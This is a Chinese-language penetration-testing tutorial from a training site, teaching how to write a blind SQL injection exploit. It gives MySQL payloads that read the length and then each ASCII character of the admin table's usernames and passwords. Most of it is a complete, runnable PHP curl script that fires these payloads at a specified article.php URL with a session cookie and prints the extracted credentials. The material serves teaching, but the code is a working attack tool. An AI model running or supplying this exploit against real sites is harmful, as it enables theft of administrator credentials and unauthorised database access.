[原创]WEB安全第七章 exp编写篇07盲注入exp篇写
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第七章 exp编写篇07盲注入exp篇写
1、 简介
在前几节课中,介绍了 简答的注入exp篇写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。
2、 盲注入原理
mysql的盲注入语句
得到表里的帐号和密码的长度
select * from article where id=1 and LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38
根据长度再判断每一位字符的ascii码
select * from article where id=1 and ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=97
3、 篇写exp
原理 就是得到数据的长度 再遍历每一个字符的ascii码再用ascii码转为字符
为什么不直接用字符 因为用的php版本会开启gpc 单引号就会被转义
[php]
<?php
//参数1:访问的URL,参数2:post数据(不填则为GET),参数3:提交的$cookies,参数4:是否返回$cookies
function curl_request($url,$post=”,$cookie=”, $returnCookie=0){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, ‘Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)’);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
if($post) {
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
}
if($cookie) {
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
}
curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($curl);
if (curl_errno($curl)) {
return curl_error($curl);
}
curl_close($curl);
if($returnCookie){
list($header, $body) = explode("\r\n\r\n", $data, 2);
preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
$info[‘cookie’] = substr($matches[1][0], 1);
$info[‘content’] = $body;
return $info;
}else{
return $data;
}
}
//得到数据的长度
function getstrlen($url,$cookie,$html){
$data_len =”;
$i = 1;
while(true){
$s = "%20and%20LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i}";
$urlexp = $url.$s;
if (strlen($html) == strlen(exploit($urlexp,$cookie))){
$data_len=$i;
break;
}
$i++;
}
return $data_len;
}
function exploit($url,$cookie){
$html = curl_request($url,”,$cookie);
return $html;
}
//38
function get_data($url,$cookie,$datalen,$tmp_html){
$admin_pass = ”;
for($i=1;$i<=$datalen;$i++){
for($j=1;$j<=125;$j++){
$s = "%20and%20ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j}";
if(strlen($tmp_html)==strlen(exploit($url.$s,$cookie))){
$c = chr($j);
$admin_pass.=$c;
echo $admin_pass."\r\n";
break;
}
}
}
return $admin_pass;
}
$cookie = ‘PHPSESSID=bn43dma24ghqeuosagkqj9ib45’;
$url = ‘http://www.moontester.com/article.php?id=1’;
//用来做比较用的
$tmp_html = exploit($url,$cookie);
$datalen = getstrlen($url,$cookie,$tmp_html);
if ($datalen){
echo get_data($url,$cookie,$datalen,$tmp_html);
}else{
echo "data null";
}
[/php]
运行截图
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/558.html